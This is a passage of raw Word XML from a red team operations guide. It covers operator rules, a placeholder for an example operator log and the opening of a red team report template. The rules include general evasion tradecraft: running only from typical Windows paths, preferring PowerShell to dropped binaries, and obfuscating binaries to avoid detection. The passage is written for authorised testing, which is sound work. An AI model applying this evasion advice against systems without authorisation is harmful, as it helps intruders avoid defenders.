        <w:t>Have proper approvals been obtained to test?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F49EC" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>EXECUTE FROM NON-EXECUTABLE LOCATIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:anchor="execute-from-non-executable-locations" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B73CA35" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Execution on a Windows environment must occur in a location typical of windows. Executable locations such as c:\programdata, c:\progam files, c:\windows\ are common. Execution for locations such as c:\windows\temp should never occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24214D8A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>USE BINARIES FOR INITIAL CAPABILITIES</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:anchor="use-binaries-for-initial-capabilities" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CA86B65" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>As a general rule</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">, do not drop binaries on the system. Use built-in commands, such as PowerShell, to achieve your goals first. This is not always </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and binaries may be required; however, binaries must be vetted, obfuscated and tested against detection before use. Ensure all other "Do’s and Don’ts" are met for all binaries. Consult a senior operator before dropping any binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542CC760" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DOWNLOAD RESTRICTED DATASETS</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:anchor="download-restricted-datasets" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54E984DE" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>NEVER download (or remove from the target network) any PII, HIPPA, PCI, or other restricted datasets. A good rule of thumb is to annotate the type of data, location, access method, and level of access of restricted data in the log. Ensure the log notes include a reference to the type of data discovered for quick reference. Take a screenshot of the displayed filename and location (assuming the file name has no restricted data included). If the operator can screenshot a portion of the dataset without capturing the restricted data, they may do so for proof-of-access; however, DO NOT take screenshots of the data itself!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D80957" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7333B89C" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46750E01" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B340444" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191C1ED9" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00BB134D" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OPERATOR LOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D82A4B" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXAMPLE OPERATOR LOG</w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:anchor="example-operator-log" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DDB79AF" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This operator log example shows the type of detail needed to describe an action taken by a red team operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749CB69" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9F2F04" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E683529" w14:textId="5CBE3FF5" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A88155" wp14:editId="55FFE17D">
            <wp:extent cx="7278894" cy="3733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297650" cy="374342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595D451" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAA7A26" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21480C0C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>RED TEAM REPORT TEMPLATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60A17B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET NAME / </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CUSTOMER</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ABC Industries, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FC440" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Report </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ABC Industries, Inc. Red Team Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8998E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>December 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E788F2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:anchor="executive-summary" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="127D73C6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> performed a Red Team engagement on [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CLIENT NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] domain from [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DATES</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF2DD2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The engagement performed by [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> employed real-world adversary techniques to target the systems under test. The sequence of activities in this approach involves </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> intelligence (OSINT) collection, enumeration, exploitation, and attack in order to perform goal specific operational impacts. The goals included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DC8A7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75A76FC7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33781F94" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
